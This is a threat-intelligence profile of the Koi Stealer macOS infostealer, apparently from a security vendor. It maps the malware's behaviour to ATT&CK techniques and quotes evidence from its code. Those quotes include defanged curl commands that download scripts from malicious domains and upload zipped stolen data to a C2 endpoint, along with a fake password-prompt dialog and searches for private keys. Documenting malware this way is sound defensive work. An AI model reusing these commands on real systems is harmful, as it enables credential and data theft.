Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
Back to malware
Malware

Koi Stealer

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
MITRE ATT&CK

Techniques & procedures

17 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

4 techniques
T1059.002AppleScriptEvidence1

"osascript<<EOD display dialog..."; "uses AppleScript to mute the system’s volume"; "uses AppleScript again... to collect specific files"

T1059.004Unix ShellEvidence1

"zsh -c ..."; "sh -c ..."; "download two additional bash scripts"

T1204User ExecutionEvidence1

"when executing the fake job interview project within Visual Studio, the malicious code attempts to download and execute two separate Mach-O binaries of RustDoor"

T1559.001Component Object ModelEvidence1

"tccutil reset AppleEvents"

Stealth

1 technique
T1027Obfuscated Files or InformationEvidence1

"strings are decrypted at runtime... XORing... with a hard-coded key"

Credential Access

4 techniques
T1056.002GUI Input CaptureEvidence1

"osascript<<EOD display dialog ... 'Please enter password' ... with hidden answer"; "prompted the user to install it and grant it Administrator access"

T1552.004Private KeysEvidence1

"zsh -c mdfind -name .pem"; "SSH configuration files (under $HOME/.ssh)"

T1555.001KeychainEvidence1

"Keychain files (under $HOME/Library/Keychains)"

T1555.003Credentials from Web BrowsersEvidence1

"Steal LastPass data from Google Chrome's extension for LastPass"; "Browser files"; "Safari files"

Discovery

3 techniques
T1057Process DiscoveryEvidence1

"ps aux List running processes"; "Process list"

T1082System Information DiscoveryEvidence1

"system_profiler SPHardwareDataType"; "sw_vers"; "Retrieve detailed information about the device’s hardware"

T1518Software DiscoveryEvidence1

"Installed applications"; "build an initial HTTP request that exfiltrates ... Installed applications"

Collection

3 techniques
T1005Data from Local SystemEvidence1

"copies multiple files of interest... Browser files... OpenVPN... Steam... Discord... Telegram... Notes... Cryptocurrency wallets"

T1056.002GUI Input CaptureEvidence1

"osascript<<EOD display dialog ... 'Please enter password' ... with hidden answer"; "prompted the user to install it and grant it Administrator access"

T1560.001Archive via UtilityEvidence1

"zsh -c zip -r [redacted].zip ..."

Command and Control

2 techniques
T1071.001Web ProtocolsEvidence1

"exfiltrate data to its C2 server"; "HTTP request"; domains "apple-ads-metric[.]com" and "visualstudiomacupdate[.]com"

T1105Ingress Tool TransferEvidence1

"curl -O -s hxxps://apple-ads-metric[.]com/npm"; "curl -O -s hxxps://apple-ads-metric[.]com/back.sh"

Exfiltration

1 technique
T1567Exfiltration Over Web ServiceEvidence1

"curl -F file=[redacted].zip hxxps://visualstudiomacupdate[.]com/tasks/upload_file"; "build an initial HTTP request that exfiltrates..."

ACTIVITY FEED

Recent activity

2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

2 SOURCESView more in app
elastic security labsNews
May 22, 2026
PHANTOMPULSE: anatomy of a hijackable blockchain-C2 RAT - Elastic Security Labs

Referenced as a DPRK-attributed macOS stealer whose crypto-wallet targeting list closely matches PHANTOMPULSE reconnaissance.

Read more
palo alto networks unit 42 blogNews
Feb 26, 2025
RustDoor and Koi Stealer for macOS Used by North Korea-Linked Threat Actor to Target the Cryptocurrency Sector

Infostealer with a newly documented macOS variant; performs host recon and credential capture (including prompting for admin password), steals browser/app/SSH/Keychain/Telegram/Discord/Steam/VPN/FileZilla data and extensive cryptocurrency wallet data, and exfiltrates in two stages to a C2; uses AppleScript for stealth (muting audio, targeted file collection) and runtime string decryption (XOR).

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping17

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.